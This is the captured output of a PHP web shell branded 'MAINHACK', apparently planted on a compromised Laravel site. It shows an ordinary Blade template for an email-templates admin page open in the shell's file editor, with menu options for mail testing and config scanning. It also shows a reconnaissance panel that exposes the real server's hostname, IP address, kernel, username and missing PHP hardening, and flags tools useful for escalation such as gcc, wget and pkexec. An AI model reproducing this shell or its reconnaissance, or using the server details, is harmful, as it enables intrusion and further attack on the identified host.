[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index.blade.php
@extends('layouts.admin') @section('page-title') {{ __('Email Templates') }} @endsection @section('links') @if (\Auth::guard('client')->check()) <li class="breadcrumb-item"><a href="{{ route('client.home') }}">{{ __('Home') }}</a></li> @else <li class="breadcrumb-item"><a href="{{ route('home') }}">{{ __('Home') }}</a></li> @endif <li class="breadcrumb-item"> {{ __('Email Templates') }}</li> @endsection @section('content') <div class="row row-gap-2 mb-4"> <div class="col-xl-12"> <div class="card"> <div class="card-body"> <div class="table-responsive"> <table id="selection-datatable" class="table"> <thead> <tr> <th scope="col" class="sort" data-sort="name"> {{ __('Name') }}</th> <th class="text-end">{{ __('Action') }}</th> </tr> </thead> <tbody> @foreach ($EmailTemplates as $EmailTemplate) <tr> <td>{{ $EmailTemplate->name }}</td> <td> @if (\Auth::user()->type == 'admin') <div class="text-end"> <div class="action-btn ms-2"> <a href="{{ route('email_template.show', [$EmailTemplate->id, \Auth::user()->lang]) }}" class="mx-3 btn btn-sm align-items-center bg-warning" data-bs-toggle="tooltip" data-bs-original-title="{{ __('View') }}"> <i class="ti ti-eye text-white"></i> </a> </div> </div> @endif </td> </tr> @endforeach </tbody> </table> </div> </div> </div> </div> </div> @endsection
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002